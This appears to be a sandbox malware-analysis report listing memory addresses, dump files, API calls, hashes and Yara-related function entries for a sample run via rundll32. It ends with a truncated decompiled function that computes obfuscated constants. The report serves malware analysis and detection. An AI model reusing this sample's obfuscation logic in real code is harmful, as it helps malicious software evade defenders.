0x00b31c8d
0x00b31c90
0x00b31c97
0x00b31c9e
0x00b31ca5
0x00b31cac
0x00b31cb6
0x00b31cbb
0x00b31cc0
0x00b31cc7
0x00b31cce
0x00b31cd5
0x00b31cd9
0x00b31cdd
0x00b31ce4
0x00b31cef
0x00b31cf0
0x00b31cf3
0x00b31cfa
0x00b31d01
0x00b31d08
0x00b31d0c
0x00b31d13
0x00b31d17
0x00b31d1e
0x00b31d25
0x00b31d29
0x00b31d30
0x00b31d37
0x00b31d3e
0x00b31d4a
0x00b31d4d
0x00b31d54
0x00b31d63
0x00b31d66
0x00b31d69
0x00b31d70
0x00b31d7e
0x00b31d81
0x00b31d88
0x00b31d8f
0x00b31d96
0x00b31d9a
0x00b31da1
0x00b31da8
0x00b31db3
0x00b31db6
0x00b31db9
0x00b31dc4
0x00b31dc7
0x00b31dce
0x00b31dd9
0x00b31ddc
0x00b31de6
0x00b31de9
0x00b31df0
0x00b31df7
0x00b31dfb
0x00b31e02
0x00b31e0d
0x00b31e0e
0x00b31e11
0x00b31e18
0x00b31e1f
0x00b31e26
0x00b31e32
0x00b31e35
0x00b31e3c
0x00b31e43
0x00b31e4a
0x00b31e51
0x00b31e58
0x00b31e5f
0x00b31e66
0x00b31e6d
0x00b31e71
0x00b31e79
0x00b31e7c
0x00b31e83
0x00b31e8a
0x00b31e8e
0x00b31e92
0x00b31e99
0x00b31ea0
0x00b31ea7
0x00b31eb2
0x00b31eb5
0x00b31ebc
0x00b31ec3
0x00b31eca
0x00b31ed1
0x00b31ed8
0x00b31ee6
0x00b31eeb
0x00b31eee
0x00b31ef5
0x00b31ef6
0x00b31ef6
0x00b31f08
0x00b31f99
0x00b31fac
0x00b31fb1
0x00b31fc8
0x00b31fcd
0x00b31fd0
0x00b31fd3
0x00b31fda
0x00b31fdb
0x00b31fde
0x00000000
0x00b31f0a
0x00b31f10
0x00b31f4e
0x00b31f61
0x00b31f66
0x00b31f69
0x00b31f6c
0x00b31f73
0x00b31f74
0x00b31f77
0x00000000
0x00b31f12
0x00b31f18
0x00b31f24
0x00b31f29
0x00b31f2c
0x00000000
0x00b31f2c
0x00b31f18
0x00b31f10
0x00000000
0x00b31f08
0x00b31ffb
0x00b32000
0x00b32005
0x00b32008
0x00b3200d
0x00b32010
0x00b32012
0x00b32012
0x00b32024

Strings

5}X, xrefs: 00B31CFA

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5}X
API String ID: 0-583016468
Opcode ID: 58b11bc2e23638cefcf399d335da026f60513ecabbe2b8d822ecb6b186335fb2
Instruction ID: fac10b47bc4820500114894409c9bc196f67c79edea193aed8a076e8001549f7
Opcode Fuzzy Hash: 58b11bc2e23638cefcf399d335da026f60513ecabbe2b8d822ecb6b186335fb2
Instruction Fuzzy Hash: 10D12271D00319EBDB18CFE5D88A9DEBBB1FF44314F208159E116BA2A0D7B91A46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10029719, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 1002651E: EnterCriticalSection.KERNEL32(EFFB1C47,?,1001014B,00000000,1004B0D8,0000000C,10010112,00000364,?,10026883), ref: 1002652D

EnumSystemLocalesW.KERNEL32(10029706,00000001,1004B400,0000000C,1002A042,00000000), ref: 10029751

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: dc5b35b9544f2ef1a2cb63f75553e0939194a2da1c74973c33621c0d89f9ec90
Instruction ID: 2df60a37ce4f38b062f1a1761c94d41bd785bc7fae285251834ed1752ba6c944
Opcode Fuzzy Hash: dc5b35b9544f2ef1a2cb63f75553e0939194a2da1c74973c33621c0d89f9ec90
Instruction Fuzzy Hash: 36F06D76A14224DFE700DFA8E981B9C77F0FB49365F10416AF611DB2A1CB756904CF48

Uniqueness

Uniqueness Score: -1.00%

Function 10030661, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

EnumSystemLocalesW.KERNEL32(100305BA,00000001,00000000,?,?,10030E40,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 10030698

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: d0c9966cb22df009f5f607db5fdbfa2366729cb63a81fb46d2479efa7d3497d0
Instruction ID: 75c8e04959bfd1de12414a6d5649df0b888cb2298ff74be165975b541e210f6b
Opcode Fuzzy Hash: d0c9966cb22df009f5f607db5fdbfa2366729cb63a81fb46d2479efa7d3497d0
Instruction Fuzzy Hash: 6EF0E53A3002465BC705DF35D965A6ABF95EFC2755F474058FA098F251C631A842C790

Uniqueness

Uniqueness Score: -1.00%

Function 1002A1D1, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,10026049,?,20001004,00000000,00000002,?,?,100253CC), ref: 1002A205

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 701f0a317aeef71a8c9f3b7b9296c8e4ed26abd9ca1a8bff134870994d04e493
Instruction ID: eec2de0a712a773ad23ce722c3be0754cbc9a2b5819a2b132ce2dd4824922064
Opcode Fuzzy Hash: 701f0a317aeef71a8c9f3b7b9296c8e4ed26abd9ca1a8bff134870994d04e493
Instruction Fuzzy Hash: BAE04F35500228BBCF12AF60EC04E9E3E59EF45760F808011FD05A5161DF769D70AAD5

Uniqueness

Uniqueness Score: -1.00%

Function 100298AA, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00029706,00000001), ref: 100298C4

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: e3f9c103c3eefe4395d8f4b6bc16ca40b006fd7550102b4d811953393c31d4aa
Instruction ID: 4bad7877b7d843de4d4cf665f4bad4e32da55ff9421d368f436bce9860f93924
Opcode Fuzzy Hash: e3f9c103c3eefe4395d8f4b6bc16ca40b006fd7550102b4d811953393c31d4aa
Instruction Fuzzy Hash: 72D0A7340183646BE700AF21EE859403B55F345390F400055F60987261DB717840CA0C

Uniqueness

Uniqueness Score: -1.00%

Function 10029878, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00029706,00000001), ref: 1002988E

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 9118635e29f5271259e7170434c17ae1bcf801cf3e4b57a8e069e56b4c7a3bd5
Instruction ID: f26d2e9e02781e66d0fb332bbbf4359ff076eba19d60e265aec88ddf1e90cc1c
Opcode Fuzzy Hash: 9118635e29f5271259e7170434c17ae1bcf801cf3e4b57a8e069e56b4c7a3bd5
Instruction Fuzzy Hash: 08D012745142609FE704EF30DED5A4037A1F70A340F500599F612CB271DB716844CF08

Uniqueness

Uniqueness Score: -1.00%

Function 10004076, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 1000407B

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3ba26cb425574bb1e5e97d6e4e3ce5ee2eeca9ea773a0f7d6151cd06e1ad6a78
Instruction ID: ea619ec60c48b02dbb355e64c897341b9eca961a532aa481cfda1eca41fb20ea
Opcode Fuzzy Hash: 3ba26cb425574bb1e5e97d6e4e3ce5ee2eeca9ea773a0f7d6151cd06e1ad6a78
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1001C71A, Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

0, xrefs: 1001C8B9

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 507dad0522ef42b1d2f140a24a37546d9dbe1884c59a01cb89d2bb9ae2c1b70d
Instruction ID: 0a08575800a55cda95973972f319f7798fcc3e9804478c37fe413ec670ade784
Opcode Fuzzy Hash: 507dad0522ef42b1d2f140a24a37546d9dbe1884c59a01cb89d2bb9ae2c1b70d
Instruction Fuzzy Hash: CF614431A0434D56DB24DA648891FBEB3D5EF46680F50052EE942DF2D1DBB1EDC18B45

Uniqueness

Uniqueness Score: -1.00%

Function 1001CE40, Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

0, xrefs: 1001CFDF

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 6ea6308736513286238a37eff5b9f1c015b15f68ea0ce49f305f5cd82fd925fd
Instruction ID: 0135d71dd575ce17db8aae7193f3e995c8939407a888322b5155aec0d1d0f13a
Opcode Fuzzy Hash: 6ea6308736513286238a37eff5b9f1c015b15f68ea0ce49f305f5cd82fd925fd
Instruction Fuzzy Hash: F9612570A0034D9ADB28EA648891FBEB3D6EF45684F50482EE846EF281D771EDC78305

Uniqueness

Uniqueness Score: -1.00%

Function 1001D0AC, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

0, xrefs: 1001D23C

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 696b20c141d328ad8a690407bb80dcd5674d115c50daedb4d0793d5fc21adf2a
Instruction ID: ea2cbbbf5da14b52565811d1af94f3e220b0178b60e1325af3c263b062b3877a
Opcode Fuzzy Hash: 696b20c141d328ad8a690407bb80dcd5674d115c50daedb4d0793d5fc21adf2a
Instruction Fuzzy Hash: EA615370A0030A77DB24FA648991BBEB3E6EB55680F60092BF952DF281D771EDC5C341

Uniqueness

Uniqueness Score: -1.00%

Function 1001C4BD, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

0, xrefs: 1001C64D

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8822ed5a69bc9f560b073828c57d074377286cf6b27712f74b43c64233c324a0
Instruction ID: 9c26b7fa49ce5624b33321d25eda2c81978084165c0639e282e695cec7de8cfe
Opcode Fuzzy Hash: 8822ed5a69bc9f560b073828c57d074377286cf6b27712f74b43c64233c324a0
Instruction Fuzzy Hash: 706157B0A00B4D96DB28DA688891FBEB3D7EB456C4F50061EE942EF281D771FDC58705

Uniqueness

Uniqueness Score: -1.00%

Function 1001C986, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

0, xrefs: 1001CB16

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e30b73a2721662dc1c1b32a0a00174f4a7528c029f323c85936146e9d8d28da7
Instruction ID: 50efc6ccef4ff16e8a5198d00afc4523914d19950f182cd2f7bc4a288799f58a
Opcode Fuzzy Hash: e30b73a2721662dc1c1b32a0a00174f4a7528c029f323c85936146e9d8d28da7
Instruction Fuzzy Hash: E8615570A0424D56DB29CA688892FBEB3E5EF55788F90051EE883EF281C731EDC5D346

Uniqueness

Uniqueness Score: -1.00%

Function 1001CBE3, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

0, xrefs: 1001CD73

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 1887e46bcb5731bdd346f882da5234bdb1a4ad87ee718ef48dfaf71d36cd8731
Instruction ID: cd32867d6c00f582bdd08d54497319113fb444356c6b1273444462af154edb57
Opcode Fuzzy Hash: 1887e46bcb5731bdd346f882da5234bdb1a4ad87ee718ef48dfaf71d36cd8731
Instruction Fuzzy Hash: 966177B0B0034D56DB28CA649891FBE73E6EF41680F50442EE84AEF281D631EDC1C786

Uniqueness

Uniqueness Score: -1.00%

Function 1001B9A5, Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

0, xrefs: 1001BB30

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b1321d98323aa79382950fcef2924b1c1a524c0656c6dac36701bd31154be194
Instruction ID: eb97638f322b7df7855bf2040408368bd7c04a1eca715451477394b98db6b170
Opcode Fuzzy Hash: b1321d98323aa79382950fcef2924b1c1a524c0656c6dac36701bd31154be194
Instruction Fuzzy Hash: FD51C170608F8956DB64C92988E27BE7BDAEF01280F90055DE983DF692D7B1EDC58313

Uniqueness

Uniqueness Score: -1.00%

Function 1001C04A, Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

0, xrefs: 1001C1D5

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: daaf62b3e15e0092e176542775df800296618b7020002aa49c03b0b76e78e313
Instruction ID: f6daf213ca5991af786234bd86231d8216c8786c7e01483eb4a6fc36f2e153c1
Opcode Fuzzy Hash: daaf62b3e15e0092e176542775df800296618b7020002aa49c03b0b76e78e313
Instruction Fuzzy Hash: 76514B71A8078DB7DB66C9744891FAE67DADB4B288F10041DE846DF683C631EDC5C252

Uniqueness

Uniqueness Score: -1.00%

Function 1001B773, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 1001B8EF

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 4c4c86d053e9d75c3f283c674c4a7a6306a1d470dc1e4910c65b799170076b8e
Instruction ID: c9aff95095a2204552c7a5bb7a506d2b5eecfbe78a8a08af0a0f37686b75a642
Opcode Fuzzy Hash: 4c4c86d053e9d75c3f283c674c4a7a6306a1d470dc1e4910c65b799170076b8e
Instruction Fuzzy Hash: E7515D70A08E4996DB64C92488D27AE6BDEEF46A84F10041EE983DF2D1DF31EDC5C351

Uniqueness

Uniqueness Score: -1.00%

Function 1001BBE6, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 1001BD62

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ea4760c08424d57875c2a49d89ea8cab0200ca1df5b4e4844df80f2b2cec58f8
Instruction ID: 957fb16e1a9e035e2c43bf81db174fb11b08e55c9dc4e81cee589c2d8ac00aff
Opcode Fuzzy Hash: ea4760c08424d57875c2a49d89ea8cab0200ca1df5b4e4844df80f2b2cec58f8
Instruction Fuzzy Hash: 05515B70A04F8956DB68C92498D27AE67DAEF42284F50451DE842DF291EF31EDC58392

Uniqueness

Uniqueness Score: -1.00%

Function 1001BE18, Relevance: 1.5, Strings: 1, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 1001BF94

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f479c867a09a753eafe8d4dd509f003e350389983cdc74a3e833a4cba08a5241
Instruction ID: 6650cc6bddf794ec34bdc87c12e056235dc4d43f9fb51d2f2d663078f00417b5
Opcode Fuzzy Hash: f479c867a09a753eafe8d4dd509f003e350389983cdc74a3e833a4cba08a5241
Instruction Fuzzy Hash: 2B516B30A00F899ADB64C9648CD1BEE77DADB05784F10442DEA42DF292C772EDCA8751

Uniqueness

Uniqueness Score: -1.00%

Function 1001C28B, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 1001C407

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d2ffc4fab2e7be211bba3664b56f3fc759b861a6e1c0c7d034ba703f6bd1d7c3
Instruction ID: 5c3c4615dca4f5fc81ca41bf50eaf0426aa318d20a4fd06e420ea5436de1b5f3
Opcode Fuzzy Hash: d2ffc4fab2e7be211bba3664b56f3fc759b861a6e1c0c7d034ba703f6bd1d7c3
Instruction Fuzzy Hash: BA518170A0478D97DB64C9A488E1FBE67DADB01284F10851EE893DF681C675EEC4C356

Uniqueness

Uniqueness Score: -1.00%

Function 00B262A3, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00B262A3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				char _v1128;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t190;
				intOrPtr _t206;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;

				_v88 = 0xf2dad;
				_t209 = 0;
				_t190 = 0x374ac1da;
				_v84 = _v84 & 0;
				_v40 = 0xb12b;
				_v40 = _v40 << 0xe;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000058bc;
				_v60 = 0xf727;
				_t210 = 0x4f;
				_v60 = _v60 / _t210;
				_v60 = _v60 ^ 0x00007065;
				_v8 = 0x9eec;
				_v8 = _v8 + 0xd770;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x00000fb6;
				_v44 = 0x7887;
				_v44 = _v44 << 5;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00001109;
				_v16 = 0xef0c;
				_t211 = 0x7a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xca26cbdc;
				_v16 = _v16 | 0x7bdc5f23;
				_v16 = _v16 ^ 0xfbfc55fd;
				_v76 = 0xd8b4;
				_v76 = _v76 + 0x9c32;
				_v76 = _v76 ^ 0x00017966;
				_v36 = 0x1b76;
				_v36 = _v36 + 0x8638;
				_v36 = _v36 | 0x465c0394;
				_v36 = _v36 ^ 0x465cdef1;
				_v28 = 0xf8c7;
				_v28 = _v28 ^ 0x90f840f6;
				_v28 = _v28 / _t211;
				_v28 = _v28 ^ 0x01300a73;
				_v80 = 0x4878;
				_v80 = _v80 ^ 0xf33f81bb;
				_v80 = _v80 ^ 0xf33fed7c;
				_v12 = 0x5e32;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xb939d170;
				_v12 = _v12 + 0xffffe46d;
				_v12 = _v12 ^ 0xb939c5f3;
				_v72 = 0xdcc7;
				_t212 = 5;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00000998;
				_v52 = 0xf409;
				_v52 = _v52 >> 7;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x00002b61;
				_v20 = 0x5cd8;
				_v20 = _v20 + 0x5908;
				_v20 = _v20 * 0x1c;
				_v20 = _v20 * 0x14;
				_v20 = _v20 ^ 0x018d9ab8;
				_v32 = 0x162d;
				_v32 = _v32 + 0xffff1b5c;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x1fff9926;
				_v64 = 0x95af;
				_v64 = _v64 + 0xffff7063;
				_v64 = _v64 ^ 0x00004670;
				_v56 = 0xeead;
				_v56 = _v56 + 0xffffd284;
				_v56 = _v56 ^ 0x94a6c65a;
				_v56 = _v56 ^ 0x94a662be;
				_v68 = 0xa18;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x0000400d;
				_v48 = 0xd4d3;
				_v48 = _v48 * 3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0013dfa3;
				_v24 = 0x2d4a;
				_v24 = _v24 << 9;
				_v24 = _v24 + 0x17ff;
				_v24 = _v24 ^ 0x005aa30d;
				do {
